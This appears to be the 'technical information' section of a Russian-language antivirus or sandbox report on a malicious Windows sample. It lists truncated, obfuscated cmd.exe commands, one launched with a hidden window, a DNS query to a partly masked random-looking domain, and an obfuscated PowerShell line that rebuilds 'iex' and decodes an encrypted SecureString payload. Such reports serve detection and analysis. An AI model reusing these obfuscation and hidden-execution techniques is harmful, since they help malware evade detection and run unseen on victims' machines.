Техническая информация
- '<SYSTEM32>\cmd.exe' ltwltrn wzlIpibAfdmuFFPWQfn iitoEJqnaYMu & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %EwwuZCpujzEuoMl%=MkBBXCiVqd&&set %pBmqbknnA%=p&&set %AbiajdmMzHEaPm%=o^w&...
- DNS ASK pq#####odiqwejes232.com
- '<SYSTEM32>\cmd.exe' ltwltrn wzlIpibAfdmuFFPWQfn iitoEJqnaYMu & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %EwwuZCpujzEuoMl%=MkBBXCiVqd&&set %pBmqbknnA%=p&&set %AbiajdmMzHEaPm%=o^w&...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ".( $SHELlID[1]+$sHeLLid[13]+'x') (( [rUNTIME.inTeropSERViCes.mARshAl]::ptRtOstRINgBsTR([RUNTiMe.INteroPSERvIceS.maRsHAl]::SECurEStringToBstr($('76492d1116743f0423413b16050a5345MgB8AEIARAA3AFAA...